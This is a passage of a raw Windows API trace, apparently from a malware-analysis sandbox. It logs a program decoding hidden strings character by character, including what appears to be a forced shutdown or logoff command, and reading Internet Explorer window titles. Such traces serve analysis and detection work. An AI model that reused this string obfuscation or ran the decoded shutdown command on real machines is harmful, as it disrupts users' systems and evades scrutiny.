pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="†", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x86\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.732] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="y", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="y") returned 1 [0174.732] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.733] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0174.733] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.734] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0174.734] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.735] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0174.735] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.742] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0174.742] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.743] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0174.743] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.744] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0174.744] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.745] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0174.745] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.746] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0174.746] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.747] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0174.747] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.748] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0174.748] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.749] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0174.749] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.750] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0174.750] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.751] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0174.756] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.757] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0174.757] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.758] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0174.758] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.759] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0174.759] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.760] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0174.760] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.761] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0174.761] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.762] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0174.762] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.762] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0174.763] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.763] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0174.764] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.764] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0174.765] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.765] GetForegroundWindow () returned 0x10162 [0174.765] GetLastError () returned 0x0 [0174.765] SysStringLen (param_1=" ") returned 0xff [0174.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0174.765] SysStringLen (param_1=" ") returned 0xff [0174.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0174.766] GetWindowTextA (in: hWnd=0x10162, lpString=0x11644c4, nMaxCount=255 | out: lpString="Blank Page - Windows Internet Explorer") returned 38 [0174.766] GetLastError () returned 0x0 [0174.766] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0174.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0174.766] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0174.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Blank Page - Windows Internet Explorer") returned 256 [0174.767] SysStringLen (param_1="Blan") returned 0x4 [0174.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Blan", cchWideChar=5, lpMultiByteStr=0x116859c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Blan", lpUsedDefaultChar=0x0) returned 5 [0174.913] SetWindowTextA (hWnd=0x103c4, lpString="Blan") returned 1 [0174.913] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0174.913] GetFocus () returned 0x0 [0174.913] lstrlenA (lpString="Blan") returned 4 [0174.913] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0174.913] GetWindowTextA (in: hWnd=0x103c4, lpString=0x10ebcd0, nMaxCount=5 | out: lpString="Blan") returned 4 [0174.913] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0174.914] GetFocus () returned 0x0 [0174.914] lstrcmpA (lpString1="Blan", lpString2="Blan") returned 0 [0174.914] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0174.914] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0174.914] GetFocus () returned 0x0 [0174.914] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0174.914] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0174.914] GetFocus () returned 0x0 [0174.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blan", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0174.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blan", cbMultiByte=-1, lpWideCharStr=0x116859c, cchWideChar=5 | out: lpWideCharStr="Blan") returned 5 [0174.914] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0174.914] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.915] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0174.915] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.916] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0174.916] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.916] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0174.917] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.917] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0174.917] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.918] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0174.918] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.918] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0174.919] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.919] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0174.919] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.920] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0174.920] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, 